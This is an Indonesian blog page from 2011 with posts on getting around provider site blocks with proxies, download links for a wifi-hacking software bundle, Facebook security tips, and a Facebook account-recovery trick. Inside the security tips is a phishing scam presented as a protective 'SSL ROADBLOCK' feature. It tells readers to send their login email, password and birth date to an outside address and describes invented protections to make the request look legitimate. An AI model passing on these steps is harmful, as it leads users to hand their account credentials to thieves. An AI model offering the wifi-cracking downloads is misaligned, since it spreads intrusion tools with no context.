headline photo

Cara masuk web yang diblokir provider

08 February 2011

Bagi kamu yang mungkin internetan pake modem broadband yang biasanya jika ingin memasuki situs tertentu kamu tidak bisa masuk karena pemblokiran oleh pihak provider , kamu bisa mengakalinya untuk bisa masuk ke web tersebut namun tidak seoptimal normalnya.

kita gunakan yang namanya proxy . banyak sekali free proxy kalian bisa search di google dengan kata kunci " free proxy "

contoh proxy

1.http://www.armyproxy.com
2.http://www.shieldmyip.com

kamu tinggal masuk ke alamt itu dan ketikan alamt web yang ingin kamu kunjungi dikotak search dan tinggal enter.selesai sekarang kamu bisa masuk ke web yang diblokir itu

HACK Wifi

10 January 2011


Banyak yang nanya pengen ngehack wifi tp gmn caranya:
nah disini gw cm kasih softwarenya aja ni pastinya rus didownload.....

http://www.enterupload.com/374a0obsjq2r/WHT_2009-2010.part1.rar.html
http://www.enterupload.com/7y1ujd6bmz49/WHT_2009-2010.part2.rar.html
http://www.enterupload.com/npulwpra14zu/WHT_2009-2010.part3.rar.html
http://www.enterupload.com/hcjg0a3asxv5/WHT_2009-2010.part4.rar.html

Cara Amankan Account FAcebook

Tips ini buat cara gimana mengetahui akun facebook lo lg diakses m orang lain.:

login ke facebook mu masuk pengaturan account atw bisa lngsng klik ini http://www.facebook.com/mobile/?settings atau https://ssl.facebook.com/confirmphone.php lalu daftarkan nmr telepon lo dan aktifkan,ikuti aza petunjuknya disana...setelah itu lo tinggal ikuti petunjuk berikut

pilih menu AKUN/ACCOUNT ->> PENGATURAN AKUN/ACCOUNT SETTING ->>KEAMANAN AKUN/SECURITY ACCOUNT ->> kemudian klik dan pilih ...YA dan centang pengaturan metode via SMS
beres dah...jika ada yang masuk ke akun facebook lo tanpa izin maka facebook akan memberitahu kamu langsung via sms bahwa akunmu ada yang memasuki tanpa izin.
dan daftarkan ssl roadblock untuk pencegahan akunmu terhack
Bagi kamu yang biasa jalan-jalan ke page privacy di halaman facebook pasti akan menemukan fitur SSL ROADBLOCK. Apa itu SSL ROADBLOCK?
Ini adalah fitur bagi kamu yang ingin akun facebookmu aman dari Hacker yang banyak berkeliaran di dunia maya ini yang bisa mengakses ke dalam akunmu...

Caranya hanya memakai fitur SSL.ROADBLOCK yang ada di facebook, dengan fitur ini kamu bisa aman dari hacker..karena jika ada seseorang yang mengetahui password facebookmu engga usah khawatir karena ssl.roadblock akan mencegahnya untuk mengakses ke akun milik kamu...

dibawah ini adalah video contoh akun yang telah memakai fitur SSL ROADBLOCK...akun dibawah ini telah saya ketahui alamt email dan paswordnya namun karena memakai fitur ssl roadblock meskipun kita mengetahui paswordnya tapi tetap saya gak bisa masuk...hanya orang yang punya akun yang bisa akses ke fb nya..

sistemnya SSL ini mengenali pemilik via IP mobile,IP komputer yang biasa dipakai..IP mobile dan IP komputer diketahui saat pendaftaran SSL ROADBLOCK...

contoh Preview SSL ROADBLOCK

video

step berikut :
masuk seperti biasa ke account facebookmu....

-> lalu masuk ke MESSAGE kemudian pilih NEW MESSAGE / KIRIM PESAN BARU

-> ketik isian kepada :SSL.ROADBLOCK@INTELLIGENCIA.COM
-> ketik isian judul : SSL ROADBLOCK
-> ketik isian Pesan :

* Full name :
* Login email and password:


Any additional information or questions for roadblock security


* Date of birth (month/day/year):



kemudian kirim
contoh:

* Full name : Jhony Long

* Login email and password: jhonylong@yahoo.com pasword:Furry

Any additional information or questions for roadblock security:

Date of birth (month/day/year): September/07/1974



akhirnya selesai deh.......
coba logout dan login kembali untuk melihat hasil previewnya...

dan jika ada orang lain yang membuka facebookmu dari jarak jauh orang itu akan terhenti di SSL ROADBLOCK yang akan membingungkan orang itu....dia akan disuguhi beberapa pertanyaan....
ini contoh gambarnya:



Jadi hanya kamu yang bisa masuk ke login account facebookmu sendiri



note:

SSL.ROADBLOCK akan aktif 5 hari setelah pendaftaran dan jika orang lain yang akan berusaha masuk ke facebook kamu di luar tempat daerah kamu suka membuka akun facebookmu


Tips untuk menjaga keamanan facebook kamu


ke 1:
kamu jangan hanya memiliki satu email account untuk dapat mengakses account facebook kamu,tambahkan email kedua pada halaman account privasi facebook kamu.
ke 2:
gunakan password yang berbeda dengan account mail kamu,,contoh:password email kamu SURTI , password facebook kamu SUKSES
kw 3:
buatlah pertanyaan pengamanan yang ketat jawabannya g nyambung tapi jawabannya bisa kamu ingat,,(pikirkanlah)
ke 4:

jika kamu suka buka facebook di warnet,setiap kamu masuk untuk login di facebook gunakanlah keyboard screen untuk mengisi email n passwordnya biar aman meskipun agak ribet.caranya:klik START dan pilih RUN dan ketikan OSK maka akan muncul keyboard digital
ke 5:
jika facebookmu kena hack orang,telitilah dengan account m

ail kamu.jika dia menghack dan mengganti alamat email facebook kamu dengan alamat lain.maka masuklah ke account mail kamu yang bersangkutan.dan lihatlah apakah ada pesan masuk dari facebook yang isinya pemberitahuan pengubahan email account facebook,klo ada ,kamu bisa cancel dengan menklik url pengcancelannya.jadi FB kamu bisa direbut kembali.
ke 6:
jangan gunakan tangal lahir sebagai password atau nomor hp cz seorang hacker yang ahli dibidang social engineering bakal dengan gampangnya mengcrack akunmu...



video lainnya....



Mengembalikan Account Facebook yang di HACK

03 January 2011

BAgaimana jika FB qta di hack orng lain?pasword diganti,dan juga pasword email dan juga security question diganti oleh orng itu sehingga otomatis qta tidak bisa login ke email utk menerima kode konfirmasi utk merubah merebut kembali fbqta..disini ada sebuah cara yang bisa kamu pakai dengan syarat email fb belum diganti dngn email yang lain.
caranya:

1.login k fb masukin email dan pasword sebelumnya,nanti stelah klik login bakal ada tulisan incorect pasword..login trs sebnyak 2x lagi nanti akan muncul "kamu telah mengganti pasword pd tgl skian skian" lalu pilih "I think Ive been hacked" nanti ada kotak dialog (isi aja kolom emailny doank)

2.setelah itu akan ada muncul kotak dengan url Http://ssl.roadblock/.....
nah isi captchanya,,setelah diisi jngn dulu klik OK atw next tapi kmu buka tab baru atw jendela dengan browser yang sama masuk ke http://ssl.facebook.com/confirmphone.php isi dengan nmr indosat kamu,,,lalu ikuti petunjuknya nanti bakal ada konfirmasi dr fb masuk k hp mu...

3.masukan kode konfirmasi ke kotak konfirmasi facebook...setelah berhasil lanjut kamu kembali ke page yang tadi kamu isi capchanya,,,skrng klik ok/next nah nanti setelah itu akan ada pilihan konfirmasi permintaan pengirimn kode,,nah klo kamu g pake cara masuk dulu ke link page confirm form td maka yang akan muncul adalah satu options yaitu pengiriman kode konfirmasi hanya melalui email sedangkan email kan g bsa dibuka lagi..tapi karena udah masuk dulu ke page confimphone maka options skrng ada dua yaitu ke email dan nmr hp,,pilih options kirim kode k nmr hp....setelah itu tinggal ikuti petunjuknya,,,udah dehhh fb kamu bisa balik lagi,,,,tinggal atur kembali aja paswordnya terserah kamu..

sumber: http://www.skyzone.tk/

selamt praktek,,,,tingkat keberhasilan tergantung nmr hp yng digunakan,,,klo bisa pake indosat..klo gagal dalam link confirm phone maka sehari kemudian baru kmu bisa coba kembali....contoh nmr indosat:085793247474

Provided by online college degree website.